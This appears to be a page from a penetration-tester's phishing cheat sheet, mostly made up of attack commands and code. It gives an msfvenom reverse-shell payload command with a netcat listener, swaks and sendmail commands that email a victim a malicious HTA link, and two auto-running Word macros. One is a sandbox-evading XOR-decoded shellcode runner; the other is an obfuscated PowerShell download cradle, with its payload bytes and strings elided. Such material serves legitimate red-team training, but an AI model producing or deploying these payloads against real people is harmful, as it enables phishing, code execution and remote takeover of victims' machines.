Phishing

Simple VBA Shell

S3cur3Th1sSh1t Reverse-Shell

nc -lvnp 8080  --- listener

BadAssMacro

BadAssMacros

Download BadAssMacrosx86.exe from the above repo.

  1. Create the raw shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f raw -o shellcode.raw

  1. Copy the out.txt into the Word file

.\BadAssMacrosx86.exe -i shellcode.raw -s indirect -p no -w doc -o out.txt

Send the Email

swaks --body 'click me http://192.168.X.X/file.hta' --add-header "Really: 1.0" --add-header "Content-Type: text/html" --header "Subject: Important" -t victim@corp.com -f attacker@corp.com --server 192.168.X.X
sendmail -f attacker@email.com -t victim@email.com -s 192.168.x.x -u "Subject" -m "body"

Word Macro

  • VBA Shellcode Runner (x86)

Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long
Private Declare PtrSafe Function FlsAlloc Lib "KERNEL32" (ByVal callback As LongPtr) As LongPtr
Function mymacro()
Dim allocRes As LongPtr
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
Dim res As Long
Dim t1 As Date
Dim t2 As Date
Dim time As Long
allocRes = FlsAlloc(0)
If IsNull(allocRes) Then
End
End If
t1 = Now()
Sleep (2000)
t2 = Now()
time = DateDiff("s", t1, t2)
If time < 2 Then
Exit Function
End If
buf = Array(...)
For i = 0 To UBound(buf)
buf(i) = buf(i) Xor 188
Next i
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
res = CreateThread(0, 0, addr, 0, 0, 0)
End Function
Sub Document_Open()
mymacro
End Sub
Sub AutoOpen()
mymacro
End Sub

  • VBA PowerShell Download Cradle

Function MyMacro()
Dim Apples As String
Dim Water As String
If ActiveDocument.Name <> Nuts("...") Then
Exit Function
End If
Apples = "..."
Water = Nuts(Apples)
GetObject(Nuts("...")).Get(Nuts("...")).Create Water, Tea, Coffee, Napkin
End Function
Function Pears(Beets)
Pears = Chr(Beets Xor 188)
End Function
Function Strawberries(Grapes)
Strawberries = Left(Grapes, 3)
End Function
Function Almonds(Jelly)
Almonds = Right(Jelly, Len(Jelly) - 3)
End Function
Function Nuts(Milk)
Do
Oatmilk = Oatmilk + Pears(Strawberries(Milk))
Milk = Almonds(Milk)
Loop While Len(Milk) > 0
Nuts = Oatmilk
End Function
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub

PreviousFile Transfer & ExecutionNextLocal Reconnaissance Windows

Last updated